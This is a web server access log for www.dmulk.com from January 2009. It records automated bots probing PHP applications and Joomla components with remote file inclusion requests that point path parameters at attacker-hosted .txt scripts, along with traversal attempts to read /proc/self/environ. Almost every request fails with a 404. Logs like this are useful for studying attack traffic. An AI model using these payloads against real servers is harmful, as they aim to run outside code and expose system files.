89.36.165.22 - - [04/Jan/2009:09:44:56 -0800] "GET /logs/access_080929.log/errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:44:56 -0800] "GET /errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:45:18 -0800] "GET /ashnews.php?pathtoashnews=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:45:18 -0800] "GET /logs/access_080523.log//ashnews.php?pathtoashnews=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:45:18 -0800] "GET /logs/access_080503.log//ashnews.php?pathtoashnews=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:45:18 -0800] "GET /logs//ashnews.php?pathtoashnews=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.107.138.34 - - [04/Jan/2009:09:45:18 -0800] "GET /logs/access_080929.log/errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.107.138.34 - - [04/Jan/2009:09:45:18 -0800] "GET /logs/errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.107.138.34 - - [04/Jan/2009:09:45:18 -0800] "GET /errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.135.56.104 - - [04/Jan/2009:09:45:22 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:45:26 -0800] "GET /logs/access_080810.log/errors.php?error=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
66.135.56.104 - - [04/Jan/2009:09:45:42 -0800] "GET /logs/access_080929.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.56.104 - - [04/Jan/2009:09:45:42 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.56.104 - - [04/Jan/2009:09:45:43 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.107.138.34 - - [04/Jan/2009:09:45:43 -0800] "GET /logs/access_080810.log/errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:45:53 -0800] "GET /logs//citywriter/head.php?path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:45:54 -0800] "GET /citywriter/head.php?path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:46:04 -0800] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:46:04 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:46:04 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:46:04 -0800] "GET /logs/access_080522.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:46:08 -0800] "GET /logs/access_080523.log//ashnews.php?pathtoashnews=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:46:08 -0800] "GET /ashnews.php?pathtoashnews=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:46:08 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:46:10 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:46:10 -0800] "GET /logs/access_080523.log//ashnews.php?pathtoashnews=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:46:11 -0800] "GET /ashnews.php?pathtoashnews=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
128.121.79.26 - - [04/Jan/2009:09:46:11 -0800] "GET /citywriter/head.php?path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.79.26 - - [04/Jan/2009:09:46:11 -0800] "GET /logs/access_080806.log//citywriter/head.php?path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.79.26 - - [04/Jan/2009:09:46:11 -0800] "GET /logs//citywriter/head.php?path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:46:12 -0800] "GET /logs/access_080503.log//ashnews.php?pathtoashnews=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:46:14 -0800] "GET /logs/access_080503.log//ashnews.php?pathtoashnews=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
128.121.79.26 - - [04/Jan/2009:09:46:16 -0800] "GET /logs/access_080512.log//citywriter/head.php?path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.204.231.202 - - [04/Jan/2009:09:46:41 -0800] "GET /logs/access_080512.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:46:41 -0800] "GET /logs/access_080717.log//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:46:41 -0800] "GET /mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:46:41 -0800] "GET /logs//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:46:48 -0800] "GET /mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:46:48 -0800] "GET /mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:46:48 -0800] "GET /logs//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:46:48 -0800] "GET /logs/access_080717.log//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:46:48 -0800] "GET /logs//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:09:46:48 -0800] "GET /logs/access_080717.log//mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:46:52 -0800] "GET /logs//citywriter/head.php?path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
222.236.47.182 - - [04/Jan/2009:09:46:52 -0800] "GET /citywriter/head.php?path=http://spikeweblist.altervista.org/rulez/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
66.135.56.104 - - [04/Jan/2009:09:46:55 -0800] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.107.138.34 - - [04/Jan/2009:09:47:08 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.107.138.34 - - [04/Jan/2009:09:47:08 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.107.138.34 - - [04/Jan/2009:09:47:08 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
205.231.144.152 - - [04/Jan/2009:09:47:16 -0800] "GET /logs/access_080530.log%20%20/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.36.165.22 - - [04/Jan/2009:09:47:24 -0800] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.getef.com.br/inc/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:47:33 -0800] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:47:33 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:47:33 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:47:34 -0800] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
221.229.126.149 - - [04/Jan/2009:09:47:36 -0800] "GET /errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
221.229.126.149 - - [04/Jan/2009:09:47:36 -0800] "GET /logs/access_080929.log/errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
221.229.126.149 - - [04/Jan/2009:09:47:36 -0800] "GET /logs/errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
221.229.126.149 - - [04/Jan/2009:09:47:57 -0800] "GET /logs/access_080810.log/errors.php?error=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:48:10 -0800] "GET /logs/access_080223.log/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:48:10 -0800] "GET /logs/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:48:10 -0800] "GET /errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:48:10 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.236.53.4 - - [04/Jan/2009:09:48:12 -0800] "GET /logs/access_080508.log%20//ashnews.php?pathtoashnews=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:48:19 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:48:19 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:48:19 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:09:48:23 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:09:48:23 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
91.142.211.198 - - [04/Jan/2009:09:48:23 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:48:25 -0800] "GET /convert/mvcw.php?vwar_root=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:48:25 -0800] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:48:25 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:48:27 -0800] "GET /logs/access_080127.log/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:48:27 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:48:27 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:48:29 -0800] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:48:29 -0800] "GET /convert/mvcw.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:48:29 -0800] "GET /logs/convert/mvcw.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:48:30 -0800] "GET /convert/mvcw.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:48:30 -0800] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:48:31 -0800] "GET /logs/convert/mvcw.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
78.110.174.10 - - [04/Jan/2009:09:48:33 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:48:34 -0800] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:48:34 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:48:38 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 65555 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:09:48:46 -0800] "GET /logs/access_080824.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
221.229.126.149 - - [04/Jan/2009:09:48:51 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
221.229.126.149 - - [04/Jan/2009:09:48:51 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
221.229.126.149 - - [04/Jan/2009:09:48:51 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://forum.muenic.de//karte/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:49:31 -0800] "GET /logs///administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:49:32 -0800] "GET /logs/access_080505.log/convert/mvcw.php?vwar_root=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:49:33 -0800] "GET /logs/access_080505.log/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:49:34 -0800] "GET /logs/access_080505.log/convert/mvcw.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:09:49:36 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.43.187.149 - - [04/Jan/2009:09:49:36 -0800] "GET /logs/access_080505.log/convert/mvcw.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:49:42 -0800] "GET /logs//citywriter/head.php?path=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:09:49:42 -0800] "GET /citywriter/head.php?path=http://www.viparenda.ru/includes/images/mraneti.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
